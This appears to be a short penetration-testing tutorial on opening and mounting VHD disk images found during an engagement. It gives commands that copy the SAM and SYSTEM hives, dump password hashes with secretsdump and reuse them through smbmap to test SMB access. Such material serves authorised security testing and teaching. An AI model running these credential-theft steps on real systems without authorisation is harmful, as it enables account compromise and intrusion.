On an engagement, you may come across VHD files that are not stored properly. This could be open on an exposed NFS or SMB share, or it could even be from a backup file that you exfiltrated. No matter how you come in contact with these files, there are many ways to go through them to extract critical information.

---

Using 7-Zip, you can view the contents of a VHD file.

7z l file.vhd

To extract the contents, you can also use 7-zip.

7z x file.vhd

---

Mounting a VHD on Linux

To mount a VHD on Linux, you can use Guest Mount.

sudo apt install libguestfs-tools -y

Now we’ll start by creating a directory that we’ll mount the VHD file to.

sudo mkdir /mnt/vhd

And then we’ll use guestmount to mount the directory in read-only (ro) mode.

guestmount --add file.vhd --inspector --ro -v /mnt/vhd

This could take a few minutes to mount depending on the size. But eventually it will finish and you should be able to view the contents.

cd /mnt/vhd
ls -la

To list the files of select directories, you can use find.

find Desktop Documents Downloads -ls

---

Extracting Local SAM Database from VHD Files

First, follow the above steps to mount the VHD file. Once mounted, you may be able to grab the files that make up the SAM database so you can crack it offline.

cd /Windows/System32/config
cp SAM SYSTEM /<localDir>

Note: You may also want to grab nts.dit if you’re on a domain controller so you can crack all of the AD hashes.

Now you can go to the local directory that you copied those files into and use secretsdump to extract the hashes.

impacket-secretsdump -sam SAM -system SYSTEM local

Instead of taking the hash offline to try and crack it, you can see if you have write access using this hash to any SMB share by using SMBmap.

smbmap -u <userName> -p <lmHash:ntHash> -H <targetIP>